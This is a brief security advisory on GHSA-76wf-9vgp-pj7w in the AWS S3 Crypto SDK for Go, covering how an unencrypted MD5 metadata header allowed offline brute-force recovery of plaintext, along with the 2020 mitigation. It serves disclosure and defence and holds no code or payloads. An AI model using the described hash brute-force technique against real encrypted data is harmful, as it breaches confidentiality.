GHSA-76wf-9vgp-pj7w: 
vulnerability analysis and mitigation

The AWS S3 Crypto SDK for golang (github.com/aws/aws-sdk-go/service/s3/s3crypto) was affected by a vulnerability discovered in August 2020 that could result in loss of confidentiality. The vulnerability, tracked as GHSA-76wf-9vgp-pj7w, affected versions prior to 1.34.0 of the SDK. The issue allowed attackers with read access to an encrypted S3 bucket to potentially recover plaintext data without accessing the encryption key (Google Security Research).

The vulnerability stemmed from the S3 crypto library storing an unencrypted MD5 hash of the plaintext alongside the ciphertext as a metadata field. This hash was exposed through the X-Amz-Meta-X-Amz-Unencrypted-Content-Md5 header, which could be used to conduct offline brute force attacks against the plaintext data. The attack was particularly effective against short plaintexts or when the attacker had access to create rainbow tables (Google Security Research).

The vulnerability posed insider risks and privilege escalation concerns by potentially circumventing KMS controls for stored data. The attack was theoretically valid when the plaintext entropy was below the key size, making it easier to brute force the plaintext instead of the key itself. The vulnerability was particularly impactful for short plaintexts or scenarios where attackers could access data to create rainbow tables (Google Security Research).

AWS fully mitigated the issue on August 5th, 2020 by blocking the vulnerable metadata field server-side. Additionally, the vulnerability was patched in version 1.34.0 of the AWS SDK for Go. The fix ensures that no S3 objects are affected anymore as the hash has been removed from being calculated (Google Security Research, Go Vulnerability).